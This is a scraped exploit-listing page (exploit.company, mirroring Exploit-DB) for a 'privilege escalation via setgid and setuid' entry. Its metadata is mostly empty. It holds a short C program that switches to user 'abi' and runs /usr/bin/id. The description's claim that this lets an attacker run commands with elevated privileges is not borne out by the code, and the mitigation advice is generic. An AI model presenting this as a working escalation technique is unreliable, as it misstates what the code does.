Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Privilege Escalation via setgid and setuid functions - exploit.company
header-logo
Suggest Exploit
vendor:
by:
7.5
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Privilege Escalation via setgid and setuid functions

This exploit leverages the setgid and setuid functions to escalate privileges. The program first retrieves the user 'abi' from the system's password file using getpwnam. Then, it sets the group ID and user ID to that of the 'abi' user. Finally, it executes the '/usr/bin/id' command using the popen function and prints the output. This allows an attacker to execute commands with elevated privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and avoid using setgid and setuid functions without proper access control. Additionally, it is important to regularly update and patch the system to address any potential vulnerabilities.
Source

Exploit-DB raw data:

#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>

int main() 
{
     struct passwd *pw;
     pw = getpwnam("abi");
     FILE *pipe;
     char buf[25];
     setgid(pw->pw_gid);
     setuid(pw->pw_uid);

     printf("my gid: %d\n", getegid());
     printf("my uid: %d\n", getuid());

     pipe = popen("/usr/bin/id", "r");
     while (fgets(buf, sizeof buf, pipe)) {
             printf("%s", buf);
     }
     printf("\n");
     pclose(pipe);
}

Navigation

Suggest Exploit

Services By CQR